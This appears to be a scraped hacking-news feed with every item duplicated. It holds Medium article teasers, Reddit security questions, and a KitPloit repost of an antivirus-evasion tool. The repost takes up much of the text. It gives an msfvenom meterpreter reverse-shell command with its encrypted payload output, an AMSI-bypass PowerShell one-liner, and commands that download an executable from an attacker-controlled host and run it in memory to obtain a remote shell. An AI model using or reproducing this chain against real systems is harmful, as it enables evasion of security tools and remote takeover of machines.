Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Network Domination & Persistence
https://cdn-images-1.medium.com/max/1000/0*4pGViGQk41Y855Kl.png
*Note: This article was originally published by the author on November 17, 2018.
Continue reading on Medium »
Network Domination & Persistence
https://cdn-images-1.medium.com/max/1000/0*4pGViGQk41Y855Kl.png
*Note: This article was originally published by the author on November 17, 2018.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Log4J vulnerability explained for Developers
https://cdn-images-1.medium.com/max/2600/0*7jVj78WaMgQ8Qfvz
Don’t let your Java program get hacked
Continue reading on Level Up Coding »
The Log4J vulnerability explained for Developers
https://cdn-images-1.medium.com/max/2600/0*7jVj78WaMgQ8Qfvz
Don’t let your Java program get hacked
Continue reading on Level Up Coding »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
LordOfRoot VM WlakThrough
https://cdn-images-1.medium.com/max/831/0*4XD8rFFMxZ6_YvXy.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
LordOfRoot VM WlakThrough
https://cdn-images-1.medium.com/max/831/0*4XD8rFFMxZ6_YvXy.png
Makineyi indirebilirsiniz.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
IgniteCTF
https://cdn-images-1.medium.com/max/1124/1*Sa9TUKgVw4E34REIhFXy9w.png
A beginner Friendly CTF Ignite Hosted on TryHackme created by DarkStar7471.
Continue reading on Medium »
IgniteCTF
https://cdn-images-1.medium.com/max/1124/1*Sa9TUKgVw4E34REIhFXy9w.png
A beginner Friendly CTF Ignite Hosted on TryHackme created by DarkStar7471.
Continue reading on Medium »
hacking: security in practice
Activism, student loans
I've never seen the answer for this so pardon me if this is a stupid question;
I know hacktivists often use their skills to support a cause, and that's obviously super admirable.
I've seen non-hackers conversationally question why hacktivists don't ever "erase student loans." So I'm wondering - is it just too hard? Is it one of those things where we laypeople just don't have the knowledge to know it doesn't work that way? How does it work?
Asking for myself, who will likely die still in debt for my stupid student loans. 🙃
submitted by /u/carrie_fister
[link] [comments]
Activism, student loans
I've never seen the answer for this so pardon me if this is a stupid question;
I know hacktivists often use their skills to support a cause, and that's obviously super admirable.
I've seen non-hackers conversationally question why hacktivists don't ever "erase student loans." So I'm wondering - is it just too hard? Is it one of those things where we laypeople just don't have the knowledge to know it doesn't work that way? How does it work?
Asking for myself, who will likely die still in debt for my stupid student loans. 🙃
submitted by /u/carrie_fister
[link] [comments]
reddit
Activism, student loans
I've never seen the answer for this so pardon me if this is a stupid question; I know hacktivists often use their skills to support a cause, and...
hacking: security in practice
Reversible databending?
I've messed around with databending art before using stuff like audacity, but I've always wondered whether this process could be reversed to reveal the original image. Sort of as a security through obscurity take on steganography.
submitted by /u/0neEyedBirb
[link] [comments]
Reversible databending?
I've messed around with databending art before using stuff like audacity, but I've always wondered whether this process could be reversed to reveal the original image. Sort of as a security through obscurity take on steganography.
submitted by /u/0neEyedBirb
[link] [comments]
reddit
Reversible databending?
I've messed around with databending art before using stuff like audacity, but I've always wondered whether this process could be reversed to...
hacking: security in practice
Pegasus (Blue Team)
Has anyone detected Pegasus in the wild? How did you manage detecting it?
submitted by /u/oldjalepeno
[link] [comments]
Pegasus (Blue Team)
Has anyone detected Pegasus in the wild? How did you manage detecting it?
submitted by /u/oldjalepeno
[link] [comments]
reddit
Pegasus (Blue Team)
Has anyone detected Pegasus in the wild? How did you manage detecting it?
hacking: security in practice
Can a p2p network be Ddosed
I’ve been thinking about this question for some time. Is it possible to crash a p2p network with attacks such as Ddosing?
submitted by /u/DarthPalpatine66
[link] [comments]
Can a p2p network be Ddosed
I’ve been thinking about this question for some time. Is it possible to crash a p2p network with attacks such as Ddosing?
submitted by /u/DarthPalpatine66
[link] [comments]
reddit
Can a p2p network be Ddosed
I’ve been thinking about this question for some time. Is it possible to crash a p2p network with attacks such as Ddosing?
hacking: security in practice
School implementing SSL inspection
Recently we received an email from our IT department asking us to install a certificate on all our devices (laptops, phones etc.) in order to continue using the school WIFI. In the email it said they’ll be using this to implement SSL inspection to “protect the school network from cyber threats”. My school has a zero tolerance policy on VPNs but it’s always been an uphill battle for them with pupils always finding a VPN they can’t detect in order to access blocked services such as Snapchat at school. (Schools in the middle of nowhere with no mobile service so cellular data isn’t an option)
Is this potentially a way of them easily detecting VPNs? Is this even legal? Should we be worried?
submitted by /u/Franic_123
[link] [comments]
School implementing SSL inspection
Recently we received an email from our IT department asking us to install a certificate on all our devices (laptops, phones etc.) in order to continue using the school WIFI. In the email it said they’ll be using this to implement SSL inspection to “protect the school network from cyber threats”. My school has a zero tolerance policy on VPNs but it’s always been an uphill battle for them with pupils always finding a VPN they can’t detect in order to access blocked services such as Snapchat at school. (Schools in the middle of nowhere with no mobile service so cellular data isn’t an option)
Is this potentially a way of them easily detecting VPNs? Is this even legal? Should we be worried?
submitted by /u/Franic_123
[link] [comments]
reddit
School implementing SSL inspection
Recently we received an email from our IT department asking us to install a certificate on all our devices (laptops, phones etc.) in order to...
hacking: security in practice
Rainbow table torrents
I'm gearing up for another password policy compliance audit and wanted to give it a shot using a rainbow table on top of my usual John/Hashcat run.
The NTLM torrent I tried to grab from freerainbowtables.com seems to only have only peers (unless something is blocking the others) that are incomplete so everything stalls at 5-15%. Before I go out of my way to generate 400GB+ of data, are there any other good sources of NTLM tables?
If i use the text files from rainbow crack, which is just a list of rtgen commands, is there a good way to run it line by line (using eval is always sketchy but every line in the file checks out)?
submitted by /u/766972
[link] [comments]
Rainbow table torrents
I'm gearing up for another password policy compliance audit and wanted to give it a shot using a rainbow table on top of my usual John/Hashcat run.
The NTLM torrent I tried to grab from freerainbowtables.com seems to only have only peers (unless something is blocking the others) that are incomplete so everything stalls at 5-15%. Before I go out of my way to generate 400GB+ of data, are there any other good sources of NTLM tables?
If i use the text files from rainbow crack, which is just a list of rtgen commands, is there a good way to run it line by line (using eval is always sketchy but every line in the file checks out)?
submitted by /u/766972
[link] [comments]
reddit
Rainbow table torrents
I'm gearing up for another password policy compliance audit and wanted to give it a shot using a rainbow table on top of my usual John/Hashcat...
Authentication Bypass & ATO
https://medium.com/@86karthikkarthik/authentication-bypass-ato-ebdc5da62c46?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@86karthikkarthik/authentication-bypass-ato-ebdc5da62c46?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Authentication Bypass & ATO
Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to…
Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to…Continue reading on Medium » (https://medium.com/@86karthikkarthik/authentication-bypass-ato-ebdc5da62c46?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Authentication Bypass & ATO
Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to…
Shellcode-Encryptor - A Simple Shell Code Encryptor/Decryptor/Executor To Bypass Anti Virus
http://www.kitploit.com/2022/01/shellcode-encryptor-simple-shell-code.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/01/shellcode-encryptor-simple-shell-code.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Shellcode-Encryptor - A Simple Shell Code Encryptor/Decryptor/Executor To Bypass Anti Virus
A simple shell code encryptor/decryptor/executor to bypass anti virus. Note: I have completely redone the work flow for creating the bypass, I have found injecting the binary into memory using PowerShell (https://www.kitploit.com/search/label/PowerShell) as the most effective method.
Purpose To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus. Instructions Use the meterpreter_encryptor.py to create the encrypted base64 shellcode: root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.1 68.1.228 -l 443 -f b64
[+] Generating MSFVENOM payload...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 667 (iteration=0)
x64/xor_dynamic chosen with final size 667
Payload size: 667 bytes
Saved as: ./msf.bin
[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...
[+] Base64 output:
sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuL mkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg Take the key and shellcode and insert it into ProcessInjector.cs (https://github.com/plackyhacker/ShellcodeEncryptor/blob/master/ProcessInjection.cs) // decrypt the base64 payload
string payload = "sZkMii [etc...]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec"; Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server. Inject the executable into a remote PowerShell process: # AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', ''))); Hopefully you will have a nice meterpreter (https://www.kitploit.com/search/label/Meterpreter) shell. Help msfconsole is listening on. -i LHOST, --lhost LHOST The local host that msfconsole is listening on. -p PAYLOAD, --payload PAYLOAD The payload to generate in msfvenom. -m METHOD, --method METHOD The method to use: thread/delegate. -k KEY, --key KEY The encryption (https://www.kitploit.com/search/label/Encryption) key (32 chars). -e ENCODER, --encoder ENCODER The meterpreter encoder. -f FORMAT, --format FORMAT The format to output.">./meterpreter_encryptor.py -h
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
optional arguments:
___________________________
@hacking_Attack
@Hacking_Video
Purpose To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus. Instructions Use the meterpreter_encryptor.py to create the encrypted base64 shellcode: root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.1 68.1.228 -l 443 -f b64
[+] Generating MSFVENOM payload...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 667 (iteration=0)
x64/xor_dynamic chosen with final size 667
Payload size: 667 bytes
Saved as: ./msf.bin
[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...
[+] Base64 output:
sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuL mkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg Take the key and shellcode and insert it into ProcessInjector.cs (https://github.com/plackyhacker/ShellcodeEncryptor/blob/master/ProcessInjection.cs) // decrypt the base64 payload
string payload = "sZkMii [etc...]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec"; Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server. Inject the executable into a remote PowerShell process: # AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', ''))); Hopefully you will have a nice meterpreter (https://www.kitploit.com/search/label/Meterpreter) shell. Help msfconsole is listening on. -i LHOST, --lhost LHOST The local host that msfconsole is listening on. -p PAYLOAD, --payload PAYLOAD The payload to generate in msfvenom. -m METHOD, --method METHOD The method to use: thread/delegate. -k KEY, --key KEY The encryption (https://www.kitploit.com/search/label/Encryption) key (32 chars). -e ENCODER, --encoder ENCODER The meterpreter encoder. -f FORMAT, --format FORMAT The format to output.">./meterpreter_encryptor.py -h
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
optional arguments:
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.